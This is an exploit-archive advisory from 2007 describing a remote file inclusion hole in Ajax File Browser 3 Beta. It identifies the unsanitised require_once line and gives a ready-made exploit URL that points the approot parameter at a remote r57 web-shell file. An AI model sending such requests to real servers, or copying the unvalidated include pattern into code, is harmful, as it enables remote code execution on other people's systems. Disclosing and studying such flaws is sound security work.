Ajax File Browser 3b (settings.inc.php approot) RFI Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Ajax File Browser 3b (settings.inc.php approot) RFI Vulnerability
# Published : 2007-09-14
# Author : arfis project
# Previous Title : Joomla Component Flash Fun! 1.0 Remote File Inclusion Vulnerability
# Next Title : Wordpress Multiple Versions Pwnpress Exploitation Tookit (0.2pub)

Ajax File Browser 3 Beta Remote File Inclusion
##############################################

                                                found by the "arfis project"
                                                http://arfis.wordpress.com/

Project Info:
-------------
	Name: Ajax File Browser
	Link: http://sourceforge.net/projects/ajaxfb/
	DL:   http://surfnet.dl.sourceforge.net/sourceforge/ajaxfb/afb-3-beta-2007-08-28.zip


Vulnerability Info:
-------------------
	File: _includes/settings.inc.php
	Line: 12
	Code: require_once($approot. _includes/functions_file.inc.php );


Exploit Example:
----------------
	http://localhost/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=http://localhost/r57.txt?


About arfis:
------------
	"arfis" stands for "automated Remote File Inclusion search". It's a perl script
	that automatically download and extract PHP projects from sourceforge.net. It then
	checks the project for RFI vulnerabilities, if found one it post's it to the arfis-
	blog, or database if you want to call it like that. Feel free to come around and
	find your own RFI:
	                   http://arfis.wordpress.com/

# www.Syue.com [2007-09-14]